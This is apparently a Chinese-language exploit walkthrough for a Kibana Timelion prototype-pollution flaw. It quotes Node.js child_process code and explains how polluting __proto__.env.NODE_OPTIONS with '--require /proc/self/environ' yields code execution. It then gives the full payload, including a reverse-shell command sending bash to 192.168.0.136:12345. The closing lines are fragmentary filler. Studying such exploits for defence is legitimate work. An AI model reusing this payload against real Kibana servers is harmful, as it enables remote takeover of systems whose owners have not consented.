const env =options.env || process.env;  获取客户端的options
  const envPairs = [];  // process.env.NODE_V8_COVERAGE alwayspropagates, making it possible to
  // collect coverage for programs that spawnwith white-listed environment.
  if (process.env.NODE_V8_COVERAGE &&
     !ObjectPrototype.hasOwnProperty(options.env || {}, 'NODE_V8_COVERAGE')){
    env.NODE_V8_COVERAGE =process.env.NODE_V8_COVERAGE;
  }  // Prototype values are intentionallyincluded.  for (const key in env) {
    const value = env[key];
    if (value !== undefined) {
      envPairs.push(`${key}=${value}`);
    }
  }

官方解释：process 对象是一个 global （全局变量），提供有关信息，控制当前 Node.js 进程。该对象表示Node所处的当前进程，允许开发者与该进程互动。打开命令行，输入node，再输入process.env，可以看见process.env是一个对象。这个对象在kibana这里就是有很多属性，我们污染的这个NODE_OPTIONS就是这个env的属性之一，其实还有NODE_ENV之类的属性。还有版本之类的

根据子进程创建的逻辑，我们是否可以构造一个恶意的代码来污染原型链，因为代码里写了如果没定义process.env就去调用系统的环境变量，而根据javascript规则，我们随意设置一个对象的_proto_的env就可以覆盖掉process的env属性了，这样的话我们可以就定义好了，定义并且赋值就不会undefined了。

简单的说就是object.env下的属性就会被写入到/proc/self/environ里。

所以poc的下半句是

.props(label.__proto__.env.NODE_OPTIONS='--require/proc/self/environ')

根据作者核心思路“在shell下传递options可以包含环境变量来执行代码也可以通过污染原型链来设置环境变量”，我们开始尝试使用代码来设置环境变量而不是shell。

而/proc/self/environ就和php一样的，如果你设置了进程的环境变量，那么在运行的时候通过linux下/proc/self/environ可以读取进程的环境变量

如何在代码里设置环境变量？

答案是通过原型链污染，我们先污染object.env，也就是设置label.__proto__.env.NODE_OPTIONS，这样的话我们去访问process.env.NODE_OPTIONS就是我们设置的值，根据上面nodejs核心代码child_process.js的逻辑，我们传递的options最终会变成spawn的一个参数 ，作为环境变量执行。

文件包含获得shell

label.__proto__.env.NODE_OPTIONS='--require/proc/self/environ' 

node --require “xxx.xxx” 

.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash-i >& /dev/tcp/192.168.0.136/12345 0>&1");process.exit()//')

AAA= require("child_process").exec("bash-i >& /dev/tcp/192.168.0.136/12345 0>&1");process.exit()//NODE_OPTIONS=--require/proc/self/environYarn_VERSION=1.17.3HOSTNAME=7da7727ddePWD=balabalabalabala#^&*(*&^%$

06

—

aaa=xxxx;